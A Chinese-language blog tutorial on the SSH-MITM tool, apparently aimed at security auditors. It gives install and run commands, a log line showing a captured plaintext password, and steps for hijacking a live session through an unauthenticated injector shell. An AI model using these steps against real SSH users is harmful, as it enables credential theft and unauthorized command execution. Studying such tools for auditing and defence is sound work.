SSH-MITM是什么工具

这篇文章给大家分享的是有关SSH-MITM是什么工具的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。

SSH-MITM-拦截SSH流量

SSH-MITM服务器专为安全审计而设计，支持公钥认证、会话劫持和文件篡改等功能。需要注意的是，该工具基于Python语言开发，因此需要在主机设备上安装并配置好Python环境。

SSH-MITM安装

在使用任何软件包之前，我们都需要进行正确的安装。如需安装SSH-MITM，我们只需要在设备上打开命令行终端，然后运行下列命令即可：

$ pip install ssh-mitm

工具使用

SSH-MITM的使用非常简单，如果需要密码认证或会话劫持，只需要开启拦截MITM-SSH服务器即可。打开命令行终端，然后运行下列命令:

$ ssh-mitm --remote-host 192.168.0.x

接下来，我们尝试跟SSH-MITM服务器建立连接。SSH-MITM服务器会监听10022端口：

$ ssh -p 10022 user@proxyserver

此时，我们将会看到凭证信息在日志中输出：

2021-01-01 11:38:26,098 [INFO]  Client connection established with parameters:    Remote Address: 192.168.0.x    Port: 22    Username: user    Password: supersecret    Key: NoneAgent: None

会话劫持

获取明文凭证信息仅仅只是SSH-MITM的其中一个功能而已，当客户端成功连接之后，SSH-MITM会开启一个新的服务器，并用于会话劫持：

2021-01-01 11:42:43,699 [INFO]  created injector shell on port 34463. connect with: ssh -p 34463 127.0.0.1

在劫持会话的时候，我们可以选择自己喜欢的SSH客户端。需要注意的是，这个连接不需要任何身份验证：

$ ssh -p 34463 127.0.0.1

建立连接之后，你的会话只会通过最新的响应信息来更新，但是我们仍然可以执行任意命令。

接下来，我们就可以在劫持的会话或原始会话中尝试执行某些命令了。

命令的执行结果将输出显示在两个会话中。

感谢各位的阅读！关于"SSH-MITM是什么工具"这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，让大家可以学到更多知识，如果觉得文章不错，可以把它分享出去让更多的人看到吧！